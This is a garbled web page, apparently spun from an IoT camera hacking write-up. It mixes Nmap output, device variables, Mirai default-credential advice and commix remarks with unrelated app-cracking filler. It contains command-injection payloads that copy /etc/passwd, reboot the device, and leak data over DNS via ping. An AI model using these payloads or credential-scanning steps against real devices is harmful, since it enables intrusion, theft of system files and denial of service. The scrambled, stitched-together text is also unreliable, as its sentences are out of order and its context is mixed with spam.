Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds Var alias="" var deviceid="BRTD-012185-MCYML" var apilisense="GPYNQM" var sys_ver="V6.3.22.38(M)" var appver="V10.1.0.9" var now=1517568122 var alarm_status=0 var upnp_status=0 var dnsenable=0 var osdenable=0 var syswifi_mode=0 var mac="00:c0:29:01:0b:b1" var wifimac="00:c0:29:01:0b:b2" var sdstatus=0 var record_sd_status=0 var dns_status=0 var devicetype=0 var devicesubtype=0 var externwifi=1 var encrypt=0 var under=0 var sdtotal=0 var sdfree=0 var sdlevel=0 I still can request some of the cgi scripts like get_status and get_params.cgi:
Look like the updated some firmwares and the root / 123456 isn't working anymore. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.
#Yoosee app hacked update#
Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. But this double-blind hack was a bit too much for this automated tool, unfortunately. Think commix like sqlmap, but for command injection. I also tried commix, as it looked promising on Youtube. There is no head, tr, less, more or cut on this device. $(cat/tmp/c) filter out unwanted charactersĪfter I finally hacked the camera, I saw the problem. $(cat /tmp/a|head -1>/tmp/b) filter for the first row $(cp /etc/passwd /tmp/a) copy /etc/passwd to a file which has a shorter name And this is the time to thank EQ for his help during the hacking session night, and for his great ideas. If you are thinking to hack games or to see hidden. The following are some examples of my desperate trying to get shell access. This lock system of certain apps and games has urged the users to discover an app which can crack the system. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. I was able to leak some information via DNS, like with the following commands I was able to see the current directory: $(ping%20-c%202%20%60pwd%60)īut whenever I tried to leak information from /etc/passwd, I failed.
0 kommentar(er)
